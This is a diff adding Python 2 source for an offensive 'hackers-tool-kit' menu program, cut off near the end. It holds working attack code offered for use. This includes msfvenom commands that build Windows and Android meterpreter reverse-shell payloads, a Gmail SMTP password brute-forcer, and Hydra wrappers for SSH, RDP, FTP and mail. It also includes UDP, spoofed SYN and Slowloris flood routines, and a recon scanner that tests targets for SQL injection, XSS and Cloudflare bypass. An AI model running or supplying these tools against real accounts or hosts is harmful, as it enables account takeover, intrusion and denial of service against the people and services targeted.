|\033[92m```````|_||:_)|```````\033[0m| | + | \033[92m|______| \033[0m| | + | ______ | | + | (__\033[90m24\033[0m__) | | + | ~~~~~~~~ | | + | By @tuf_unkn0wn | | + |______________________|/ + \033[91m + ) ( ) ( + ( /( )\ ) ( /( )\ ( ( ( + )\()|(_| /( ( )\()) ((_)))\ ( )\))( ( + ((_)\ _ )(_)) )\((_)\ _ /((_) )\ )((_))\ )\ + | |(_) ((_)_ ((_) |(_) | (_))( _(_/( (()(_|(_) + | '_ \ / _` / _|| / / | | || | ' \)) _` |(_-< + |_.__/_\__,_\__||_\_\ |_|\_,_|_||_|\__, |/__/ + |___/ + \033[90m + ) + (\033[33m + _ \033[0m___________ \033[90m)\033[33m + [_[\033[0m___________\033[91m#\033[0m + """.decode('utf-8') +def mainbanner7(): + os.system("cat /root/hackers-tool-kit/tools/skull.txt") +def mainbanner(): + import random + for x in range(10): + num = random.randint(1,7) + if num == 1: + mainbanner1() + if num == 2: + mainbanner2() + if num == 3: + mainbanner3() + if num == 4: + mainbanner4() + if num == 5: + mainbanner5() + if num == 6: + mainbanner6() + if num == 7: + mainbanner7() +#--------------------------# +#MAIN STARTING BANNER END# + + +#HELP BANNER START# +#-----------------# +def help(): + print B+""" +▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ + ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ + ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ +\033[0m ░ +about : about the creator / me +? : displays this message +clear : clears screen except for banner +clearall: clears everything on screen +banner : clears screen and shows new banner +exit : exits script +restart : re run hackers-tool-kit +rebootl : reboot whole device +winload : windows reverse_tcp payload +andload : android reverse_tcp payload +connect : connect to a host +command : execute terminal command +msfcon : metasploit console +set : setoolkit console +msfven : msfvenom +gmail : gmail bruteforce +insta : instagram bruteforce +fb : facebook bruteforce +hydra : Black-Hydra bruteforce +medusa : Medusa bruteforce +ipgrab : host to ip address +myip : show your ip +wifite : automated wifi hacker +reaver : reaver automated [ wifi hack ] +aircrack: aircrack-ng automated [ wifi hack ] +mon : put device in monitor mode +monoff : put device out of monitor mode +netdev : find all devices in your network +scannet : scan for networks around you +specnet : scan a specific network +port : scan for ports on a host +info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m +sysinfo : info about your system \033[91m ██ ██\033[0m +msfex : shows all metasploit exploits \033[91m ██ ██\033[0m +msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfall : shows all metasploit modules \033[91m ██ ██\033[0m +udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m +tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m +syn : SYN flood / dos \033[91m █ █\033[0m +slowl : Slow Loris dos \033[91m █ █ \033[0m +ping : pings host \033[91m █ █\033[0m +multih : start a multi handler \033[91m █ █\033[0m +cupp : make wordlists \/ vvvvvvvvv \/ +vdir : view files of a directory +vpn : activate a vpn +vpnoff : stop vpn +pidox : dox website +pingen : Generate a routers default pin +deauth : deauth attack / wifi jammer +macc : changes mac address +macoff : returns mac address to normal Hackers-Tool-Kit +arpspoof: arp spoofing | +sslscan : ssl scan a host ██╗ ██╗ ████████╗ ██╗ ██╗ +payload : make a metasploit payload of your choice ██║ ██║ ╚══██╔══╝ ██║ ██╔╝ +crunch : Make wordlists ███████║\033[91m█████\033[0m╗██║\033[91m█████\033[0m╗█████╔╝ +traff : shows your internet traffic ██╔══██║╚════╝██║╚════╝██╔═██╗ +resa : reset account password ██║ ██║ ██║ ██║ ██╗ +resu : reset unix password ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ +hashid : find the type of hash of a hash | +wafwoof : check a web application for firewall Hackers-Tool-Kit +cloud : cloudflare bypass +brutex : auto bruteforce every service of a host +methelp : show meterpreter help +winbyp : windows defender bypass +exploit : use a metasploit exploit of your choice +phish : phishing automated +datalist: list all hosts & services in the database +msfev : shows all metasploit evasions +upgrade : fully update your linux os +nscript : use a nmap script +sshver : scan for ssh version on a host +chains : browse web anonymous via proxychains [proxychains setup required] +mysqlv : scan for mysql version on a host +terminal: open another new terminal +source : get source code from a website +dirscan : web directory scanner / bruteforce +aserver : start a apache server +run : run a file ] +phpload : make a php reverse_tcp payload and start it in a multi handler +\033[91m---------------------------------------------------------------------------------\033[0m + """ +#-----------------# +#HELP BANNER END# + + +#WINDOWS REVERSE TCP PAYLOAD START# +#---------------------------------# +def winload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +#-------------------------------# +#WINDOWS REVERSE TCP PAYLOAD END# + + +#ANDROID REVERSE TCP PAYLOAD START# +#---------------------------------# +def andload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +#-------------------------------# +#ANDROID REVERSE TCP PAYLOAD END# + +#GMAIL BRUTEFORCE START# +#----------------------# +def gmail(): + #!/usr/bin/python + '''create by Ha3MrX''' + + import smtplib + from os import system + + def main(): + print '\033[93m=================================================' + print '\033[91m create by Ha3MrX ' + print '\033[93m=================================================' + print '\033[95m ++++++++++++++++++++ ' + print '\n ' + print '\033[92m _,. ' + print ' ' + print ' ' + print ' HA3MrX ' + print ' _,. ' + print ' ,` -.) ' + print ' ( _/-\\-._ ' + print ' /,|`--._,-^| , ' + print ' \_| |`-._/|| , | ' + print ' | `-, / | / / ' + print ' | || | / / ' + print ' `r-._||/ __ / / ' + print ' __,-<_ )`-/ `./ / ' + print ' \ `--- \ / / / ' + print ' | |./ / ' + print ' / // / ' + print ' \_/ \ |/ / ' + print ' | | _,^- / / ' + print ' | , `` (\/ /_ ' + print ' \,.->._ \X-=/^ ' + print ' ( / `-._//^` ' + print ' `Y-.____(__} ' + print ' | {__) ' + print ' () \033[91m V.1.0 ' + + main() + print '\033[0m[1] start the attack' + print '[2] exit' + option = input('==>') + if option == 1: + file_path = raw_input('path of passwords file :') + else: + system('clear') + exit() + pass_file = open(file_path,'r') + pass_list = pass_file.readlines() + def login(): + i = 0 + user_name = raw_input('target email :') + server = smtplib.SMTP_SSL('smtp.gmail.com', 465) + server.ehlo() + for password in pass_list: + i = i + 1 + print str(i) + '/' + str(len(pass_list)) + try: + server.login(user_name, password) + system('clear') + main() + print '\n' + print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' + break + except smtplib.SMTPAuthenticationError as e: + error = str(e) + if error[14] == '<': + system('clear') + main() + print '[+] this account has been hacked, password :' + password + ' ^_^' + + break + else: + print '[!] password not found => ' + password + login() +#--------------------# +#GMAIL BRUTEFORCE END# + +#PORT SCAN START# +#---------------# +def port(): + n = raw_input("Enter Target: ") + os.system("nmap " + n) +#-------------# +#PORT SCAN END# + +#INSTAGRAM BRUTEFORCE START# +#--------------------------# +def insta(): + insta = raw_input("USERNAME> ") + jl = raw_input("WORDLIST> ") + k = raw_input("THREADS> ") + ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) + os.system(ma) +#------------------------# +#INSTAGRAM BRUTEFORCE END# + +#FACEBOOK BRUTEFORCE START# +#-------------------------# +def fb(): + facebook = raw_input("[EMAIL/ID->]: ") + word = raw_input("[WORDLIST->]: ") + ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) + os.system(ks) +#-----------------------# +#FACEBOOK BRUTEFORCE END# + +#HOST TO IP START# +#----------------# +def ipgrab(): + b = raw_input(Y+'Enter Host:\033[0m ') + ip = socket.gethostbyname(b) + print G+"------------------------\033[0m" + print N+"Host: ", b + print N+"IP: ", ip + print G+"------------------------\033[0m" +#--------------# +#HOST TO IP END# + +#YOUR OWN IP START# +#-----------------# +def myip(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) + print "\n Router IP" + print "----------------------------\033[92m" + os.system('curl "http://myexternalip.com/raw"') + print "\n\033[0m----------------------------" +#---------------# +#YOUR OWN IP END# + + +#AUTOMATED WIFI HACK START# +#-------------------------# +def wifite(): + os.system("wifite") +#-----------------------# +#AUTOMATED WIFI HACK END# + + +#MONITOR MODE START# +#------------------# +def mon(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng start " + i) +#----------------# +#MONITOR MODE END# + + +#DEVICES IN THE NET START# +#------------------------# +def netdev(): + os.system("netdiscover") +#----------------------# +#DEVICES IN THE NET END# + + +#NETS AROUND YOU START# +#-----------------------# +def scannet(): + os.system("iwconfig") + m = raw_input("Select Interface: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + os.system("airodump-ng -w /root/SCAN " + m) + print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" + if j == "n": + os.system("airodump-ng " + m) +#---------------------# +#NETS AROUND YOU END# + + +#INFO SCAN HOST START# +#--------------------# +def info(): + params = [] + # Browser + br = mechanize.Browser() + + # Just some colors and shit + white = '\033[1;97m' + green = '\033[1;32m' + red = '\033[1;31m' + yellow = '\033[1;33m' + end = '\033[1;m' + info = '\033[1;33m[!]\033[1;m' + que = '\033[1;34m[?]\033[1;m' + bad = '\033[1;31m[-]\033[1;m' + good = '\033[1;32m[+]\033[1;m' + run = '\033[1;97m[~]\033[1;m' + + # Cookie Jar + cj = cookielib.LWPCookieJar() + br.set_cookiejar(cj) + + # Browser options + br.set_handle_equiv(True) + br.set_handle_redirect(True) + br.set_handle_referer(True) + br.set_handle_robots(False) + + # Follows refresh 0 but not hangs on refresh > 0 + br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) + br.addheaders = [ + ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] + + + print '''\033[1;31m + _________ __ __ __ + / _____// |________|__| | __ ___________ + \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ + / \| | | | \/ | <\ ___/| | \/ + /_______ /|__| |__| |__|__|_ \\\\___ >__| + \/ \/ \/\033[1;m''' + target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') + if 'http' in target: + parsed_uri = urlparse(target) + domain = '{uri.netloc}'.format(uri=parsed_uri) + else: + domain = target + try: + br.open('http://' + target) + target = 'http://' + target + except: + target = 'https://' + target + + def sqli(url): + print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run + br.open('https://suip.biz/?act=sqlmap') + br.select_form(nr=0) + br.form['url'] = url + req = br.submit() + result = req.read() + match = search(r"---(?s).*---", result) + if match: + print '%s One or more parameters are vulnerable to SQL injection' % good + option = raw_input( + '%s Would you like to see the whole report? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + print '\033[1;31m-\033[1;m' * 40 + print match.group().split('---')[1][:-3] + print '\033[1;31m-\033[1;m' * 40 + else: + print '%s None of parameters is vulnerable to SQL injection' % bad + + + def cms(domain): + try: + result = br.open('https://whatcms.org/?s=' + domain).read() + detect = search(r'class="nowrap" title="[^<]*">', result) + WordPress = False + try: + r = br.open(target + '/robots.txt').read() + if "wp-admin" in str(r): + WordPress = True + except: + pass + if detect: + print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) + detect = detect.group().split('">')[1][:-27] + if 'WordPress' in detect: + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + elif WordPress: + print '%s CMS Detected : WordPress' % info + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + else: + print '%s %s doesn\'t seem to use a CMS' % (info, domain) + except: + pass + + def honeypot(ip_addr): + result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} + honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr + try: + phoney = br.open(honey).read() + if float(phoney) >= 0.0 and float(phoney) <= 0.4: + what = good + else: + what = bad + print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) + except KeyError: + print '\033[1;31m[-]\033[1;m Honeypot prediction failed' + + def whoisIt(url): + who = "" + print '{} Trying to gather whois information for {}'.format(run,url) + try: + who = str(whois.whois(url)).decode() + except Exception: + pass + test = who.lower() + if "whoisguard" in test or "protection" in test or "protected" in test: + print '{} Whois Protection Enabled{}'.format(bad, end) + else: + print '{} Whois information found{}'.format(good, end) + try: + data = json.loads(who) + for key in data.keys(): + print "{} :".format(key.replace("_", " ").title()), + if type(data[key]) == list: + print ", ".join(data[key]) + else: + print "{}".format(data[key]) + except ValueError: + print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) + pass + + def nmap(ip_addr): + port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr + result = br.open(port).read() + result = sub(r'Starting[^<]*\)\.', '', result) + result = sub(r'Service[^<]*seconds', '', result) + result = os.linesep.join([s for s in result.splitlines() if s]) + print result + + def bypass(domain): + post = urlencode({'cfS': domain}) + result = br.open( + 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() + + match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) + if match: + bypass.ip_addr = match.group().split(' ')[1][:-1] + print '%s Real IP Address : %s' % (good, bypass.ip_addr) + + def dnsdump(domain): + res = DNSDumpsterAPI(False).search(domain) + print '\n%s DNS Records' % good + for entry in res['dns_records']['dns']: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + for entry in res['dns_records']['mx']: + print '\n%s MX Records' % good + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n\033[1;32m[+]\033[1;m Host Records (A)' + for entry in res['dns_records']['host']: + if entry['reverse_dns']: + print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) + else: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n%s TXT Records' % good + for entry in res['dns_records']['txt']: + print entry + print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) + + + def fingerprint(ip_addr): + try: + result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() + match = search(r'"os_description": "[^<]*"', result) + if match: + print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) + except: + pass + + + ip_addr = socket.gethostbyname(domain) + print '%s IP Address : %s' % (info, ip_addr) + try: + r = requests.get(target) + header = r.headers['Server'] + if 'cloudflare' in header: + print '%s Cloudflare detected' % bad + bypass(domain) + try: + ip_addr = bypass.ip_addr + except: + pass + else: + print '%s Server: %s' % (info, header) + try: + print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) + except: + pass + try: + r.headers['X-Frame-Options'] + except: + print '%s Clickjacking protection is not in place.' % good + except: + pass + fingerprint(ip_addr) + cms(domain) + try: + honeypot(ip_addr) + except: + pass + print "{}----------------------------------------{}".format(red, end) + whoisIt(domain) + try: + r = br.open(target + '/robots.txt').read() + print '\033[1;31m-\033[1;m' * 40 + print '%s Robots.txt retrieved\n' % good, r + except: + pass + print '\033[1;31m-\033[1;m' * 40 + nmap(ip_addr) + print '\033[1;31m-\033[1;m' * 40 + dnsdump(domain) + os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) + try: + br.open(target) + print '%s Crawling the target for fuzzable URLs' % run + for link in br.links(): + if 'http' in link.url or '=' not in link.url: + pass + else: + url = target + '/' + link.url + params.append(url) + if len(params) == 0: + print '%s No fuzzable URLs found' % bad + quit() + print '%s Found %i fuzzable URLs' % (good, len(params)) + for url in params: + print url + sqli(url) + url = url.replace('=', '') + r = br.open(url).read() + if '' in r: + print '%s One or more parameters are vulnerable to XSS' % good + break + print '%s These are the URLs having parameters:' % good + for url in params: + print url + except: + pass +#------------------# +#INFO SCAN HOST END# + + +#INFO ON YOUR SYSTEM START# +#-------------------------# +def sysinfo(): + os.system("iwconfig") + k = raw_input("Interface: ") + os.system("clear") + os.system("ifconfig") + print "\n" + os.system("iwconfig") + print "\n" + os.system("neofetch") + print "\n" + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) + print "\n Router IP" + print "----------------------------\033[92m" + os.system('curl "http://myexternalip.com/raw"') + print "\n\033[0m----------------------------" + print "\n" + show = 'macchanger -s {0}'.format(k) + os.system(show) +#-----------------------# +#INFO ON YOUR SYSTEM END# + + +#ALL METASPLOIT EXPLOITS START# +#-----------------------------# +def msfex(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show exploits'""") +#---------------------------# +#ALL METASPLOIT EXPLOITS END# + + +#UDP DOS START# +#-------------# +def udp(): + target = raw_input(N+"Target:\033[91m ") + ip = socket.gethostbyname(target) + port = input(N+"Port:\033[91m ") + os.system("service tor restart") + print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) + os.system("sleep 2s") + sent = 0 + print "KILLING %s CONNECTIONS"%(ip) + while True: + sock.sendto(Gb, (ip,port)) + sock.sendto(bytes, (ip,port)) + sock.sendto(Kb, (ip,port)) + sent = sent + 1 + port = port + 1 + print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) + if port == 65534: + port = 1 +#-----------# +#UDP DOS END# + +#TCP FLOOD START# +#---------------# +def tcp(): + print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" + print "\n" + tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") + print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" + os.system("sleep 5") + os.system("python /root/hackers-tool-kit/tools/" + tcp) +#-------------# +#TCP FLOOD END# + + +#SYN FLOOD START# +#---------------# +def syn(): + def randomIP(): + ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) + return ip + + def randInt(): + x = random.randint(1000,9000) + return x + + def SYN_Flood(dstIP,dstPort,counter): + total = 0 + print "Packets are sending ..." + for x in range (0,counter): + s_port = randInt() + s_eq = randInt() + w_indow = randInt() + + IP_Packet = IP () + IP_Packet.src = randomIP() + IP_Packet.dst = dstIP + + TCP_Packet = TCP () + TCP_Packet.sport = s_port + TCP_Packet.dport = dstPort + TCP_Packet.flags = "S" + TCP_Packet.seq = s_eq + TCP_Packet.window = w_indow + + send(IP_Packet/TCP_Packet, verbose=0) + total+=1 + sys.stdout.write("\nTotal packets sent: %i\n" % total) + + + def info(): + + dstIP = raw_input ("\nTarget IP : ") + dstPort = input ("Target Port : ") + + return dstIP,int(dstPort) + + + def main(): + dstIP,dstPort = info() + counter = input ("Packets : ") + SYN_Flood(dstIP,dstPort,int(counter)) + + main() +#-------------# +#SYN FLOOD END# + + +#PING A HOST START# +#-----------------# +def ping(): + p = raw_input("Enter Host: ") + os.system("ping " + p) +#---------------# +#PING A HOST END# + + +#ALL METASPLOIT PAYLOADS START# +#-----------------------------# +def msfpa(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show payloads'""") +#---------------------------# +#ALL METASPLOIT PAYLOADS END# + + +#ALL METASPLOIT AUX START# +#------------------------# +def msfau(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show auxiliary'""") +#----------------------# +#ALL METASPLOIT AUX END# + + +#START METASPLOIT HANDLER START# +#------------------------------# +def multih(): + os.system("service postgresql start") + os.system("""msfconsole -x 'use multi/handler'""") +#----------------------------# +#START METASPLOIT HANDLER END# + + +#ALL METASPLOIT MODS START# +#-------------------------# +def msfall(): + os.system("service postgresql start") + os.sytem("""msfconsole -x 'show all'""") +#-----------------------# +#ALL METASPLOIT MODS END# + + +#HYDRA AUTOMATED START# +#---------------------# +def hydra(): + """ + This program is just a small program to shorten brute force sessions on hydra :) + But to be more satisfying results of the brute force. You better interact directly with hydra, + without having to use this black hydra console first: '). + If you find any errors in running our program. Can chat via facebook :). + Hydra is needed for the process of this program :). + """ + import sys, os, time + + # Restart #################### + def restart_program(): + python = sys.executable + os.execl(python, python, * sys.argv) + curdir = os.getcwd() + ############################## + + os.system("clear") + print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" + print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" + print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" + print G+"-----------------------------------------------------" + print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" + print R+" [*] Author: DedSecTL --- [*] Version 1.0" + print N+"c=={:::::::::::::::> Black Hydra Console" + print R+" [*] My FB : https://m.facebook.com/100004136748473" + print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" + print + print " ===|[ Brute Force ]|===" + print + print " [01] Cisco Brute Force " + print " [02] VNC Brute Force " + print " [03] FTP Brute Force " + print " [04] Gmail Brute Force " + print " [05] SSH Brute Force " + print " [06] TeamSpeak Brute Force " + print " [07] Telnet Brute Force " + print " [08] Yahoo Mail Brute Force " + print " [09] Hotmail Brute Force " + print " [10] Router Speedy Brute Force " + print " [11] RDP Brute Force " + print " [12] MySQL Brute Force " + print + print " [00] Exit" + print + bhydra = raw_input("[*] B-Hydra > ") + + if bhydra == '01' or bhydra == '1': + print + print " +---------------------------+" + print " | Cisco Brute Force |" + print " +---------------------------+" + print + print + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -P %s %s cisco" % (word, iphost)) + sys.exit() + + elif bhydra == '02' or bhydra == '2': + print + print " +---------------------------+" + print " | VNC Brute Force |" + print " +---------------------------+" + print + print + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) + iphost = raw_input("[*] IP/Hostname : ") + + elif bhydra == '03' or bhydra == '3': + print + print " +------------------------------+" + print " | FTP Brute Force |" + print " +------------------------------+" + print + print + user = raw_input("[*] User : ") + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '04' or bhydra == '4': + print + print " +------------------------------+" + print " | Gmail Brute Force |" + print " +------------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '05' or bhydra == '5': + print + print " +--------------------------------+" + print " | SSH Brute Force |" + print " +--------------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) + sys.exit() + + elif bhydra == '06' or bhydra == '6': + print + print " +-------------------------+" + print " | TeamSpeak Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) + sys.exit() + + elif bhydra == '07' or bhydra == '7': + print + print " +-------------------------+" + print " | Telnet Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) + sys.exit() + + elif bhydra == '08' or bhydra == '8': + print + print " +---------------------------+" + print " | Yahoo Brute Force |" + print " +---------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '09' or bhydra == '9': + print + print " +----------------------------+" + print " | Hotmail Brute Force |" + print " +----------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '10': + print + print " +-----------------------------+" + print " | Router Speedy Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) + sys.exit() + + elif bhydra == '11': + print + print " +----------------------------+" + print " | RDP Brute Force |" + print " +----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '12': + print + print " +-----------------------------+" + print " | MySQL Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) + + elif bhydra == '00' or bhydra == '0': + print "\n[!] Exit the Program..." + sys.exit() + + else: + print "\n[!] ERROR : Wrong Input" + time.sleep(1) + restart_program() +#-------------------# +#HYDRA AUTOMATED END# + + +#WORDLIST MAKER START# +#--------------------# +def cupp(): + os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") + print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" +#------------------# +#WORDLIST MAKER END# + + +#LIST FILES START# +#----------------# +def vdir(): + print "\n" + os.system("ls") + print Y+"! doesnt have to be these can be any directory !\033[0m" + print "\n" + h = raw_input("Directory Path: ") + print "\n" + print "--------------------------------------------------------------------------------------------------------------------------------------------" + os.system("ls " + h) + print "--------------------------------------------------------------------------------------------------------------------------------------------" +#--------------# +#LIST FILES END# + + +#MONITOR MODE OFF START# +#----------------------# +def monoff(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng stop " + i) +#--------------------# +#MONITOR MODE OFF END# + + +#TURN ON VPN START# +#-----------------# +def vpn(): + os.system("anonsurf start") + os.system("anonsurf myip") +#---------------# +#TURN ON VPN END# + + +#TURN OFF VPN START# +#------------------# +def vpnoff(): + os.system("anonsurf stop") + os.system("anonsurf myip") +#----------------# +#TURN OFF VPN END# + + +#SLOW LORIS DOS START# +#--------------------# +def slowl(): + de = raw_input("Delay: ") + tar = raw_input("RHOST: ") + port = raw_input("RPORT: ") + soc = raw_input("Sockets: ") + os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') + os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) + os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) + os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) + os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) + os.system('echo "run\n" >> slowl.rc') + os.system('msfconsole -r slowl.rc') + os.system('rm -rf slowl.rc') +#------------------# +#SLOW LORIS DOS END# + + +#OPEN DOX WEBSITE START# +#----------------------# +def pidox(): + print Y+"! USING FIREFOX !\033[0m" + os.system("sleep 2") + os.system("firefox https://pipl.com/") +#--------------------# +#OPEN DOX WEBSITE END# + + +#SCAN SPECIFIC NET START# +#-----------------------# +def specnet(): + jk = raw_input("BSSID: ") + kj = raw_input("ESSID: ") + os.system("iwconfig") + k = raw_input("INTERFACE: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) + if j == "n": + a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) +#---------------------# +#SCAN SPECIFIC NET END# + + +#DEFAULT WIFI PIN START# +#----------------------# +def pingen(): + j = raw_input("Enter BSSID: ") + a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) + os.system(a) +#--------------------# +#DEFAULT 